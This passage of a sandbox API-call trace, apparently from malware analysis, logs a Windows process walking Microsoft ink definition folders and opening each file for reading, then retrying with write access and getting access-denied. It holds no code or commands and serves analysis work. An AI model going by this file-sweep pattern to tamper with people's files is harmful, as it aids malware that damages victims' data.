lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ce7a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.514] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x42d, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknavbase.xml", cAlternateFileName="")) returned 1 [0099.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0099.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0099.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0099.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0099.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0099.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0099.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0099.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a958 [0099.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0099.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81d68 [0099.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81d68 | out: hHeap=0x20000) returned 1 [0099.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.515] AreFileApisANSI () returned 1 [0099.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml", lpUsedDefaultChar=0x0) returned 87 [0099.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0099.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.515] AreFileApisANSI () returned 1 [0099.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0099.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81ed8 [0099.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x81ed8, cchWideChar=87 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml") returned 87 [0099.591] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.608] GetFileType (hFile=0x27c) returned 0x1 [0099.608] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81ed8 | out: hHeap=0x20000) returned 1 [0099.609] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.609] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.609] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.609] CloseHandle (hObject=0x27c) returned 1 [0099.609] AreFileApisANSI () returned 1 [0099.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0099.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x816f0 [0099.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x816f0, cchWideChar=87 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml") returned 87 [0099.609] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.610] GetLastError () returned 0x5 [0099.610] GetLastError () returned 0x5 [0099.610] SetLastError (dwErrCode=0x5) [0099.610] GetLastError () returned 0x5 [0099.610] SetLastError (dwErrCode=0x5) [0099.610] GetLastError () returned 0x5 [0099.610] SetLastError (dwErrCode=0x5) [0099.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x816f0 | out: hHeap=0x20000) returned 1 [0099.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0099.610] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.610] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.610] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0xac, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x55f28, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0xac, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧Э")) returned 0 [0099.610] FindClose (in: hFindFile=0x784d0 | out: hFindFile=0x784d0) returned 1 [0099.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0099.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0099.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0099.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0099.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0099.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0099.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0099.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0099.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0099.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0099.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0099.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.611] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.611] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.611] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.611] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0099.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.611] AreFileApisANSI () returned 1 [0099.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml", lpUsedDefaultChar=0x0) returned 76 [0099.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0099.611] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.611] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0099.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0099.611] AreFileApisANSI () returned 1 [0099.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0099.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85e40 [0099.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x85e40, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml") returned 76 [0099.612] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.612] GetFileType (hFile=0x418) returned 0x1 [0099.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85e40 | out: hHeap=0x20000) returned 1 [0099.612] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.612] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.612] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.612] CloseHandle (hObject=0x418) returned 1 [0099.613] AreFileApisANSI () returned 1 [0099.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0099.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85940 [0099.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x85940, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml") returned 76 [0099.613] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.613] GetLastError () returned 0x5 [0099.613] GetLastError () returned 0x5 [0099.613] SetLastError (dwErrCode=0x5) [0099.613] GetLastError () returned 0x5 [0099.613] SetLastError (dwErrCode=0x5) [0099.613] GetLastError () returned 0x5 [0099.613] SetLastError (dwErrCode=0x5) [0099.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85940 | out: hHeap=0x20000) returned 1 [0099.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0099.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0099.613] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.613] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.613] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ceb7f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="osknumpad", cAlternateFileName="OSKNUM~1")) returned 1 [0099.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0099.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0099.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0099.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0099.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0099.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0099.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0099.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0099.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0099.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.614] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.614] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.614] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.614] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0099.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.614] AreFileApisANSI () returned 1 [0099.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad", lpUsedDefaultChar=0x0) returned 75 [0099.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0099.614] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.614] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0099.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.614] AreFileApisANSI () returned 1 [0099.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0099.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85120 [0099.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad") returned 75 [0099.614] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.615] GetLastError () returned 0x5 [0099.615] GetLastError () returned 0x5 [0099.615] SetLastError (dwErrCode=0x5) [0099.615] GetLastError () returned 0x5 [0099.615] SetLastError (dwErrCode=0x5) [0099.615] GetLastError () returned 0x5 [0099.615] SetLastError (dwErrCode=0x5) [0099.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0099.615] AreFileApisANSI () returned 1 [0099.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0099.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85da0 [0099.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x85da0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad") returned 75 [0099.615] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.615] GetLastError () returned 0x5 [0099.615] GetLastError () returned 0x5 [0099.615] SetLastError (dwErrCode=0x5) [0099.615] GetLastError () returned 0x5 [0099.615] SetLastError (dwErrCode=0x5) [0099.615] GetLastError () returned 0x5 [0099.615] SetLastError 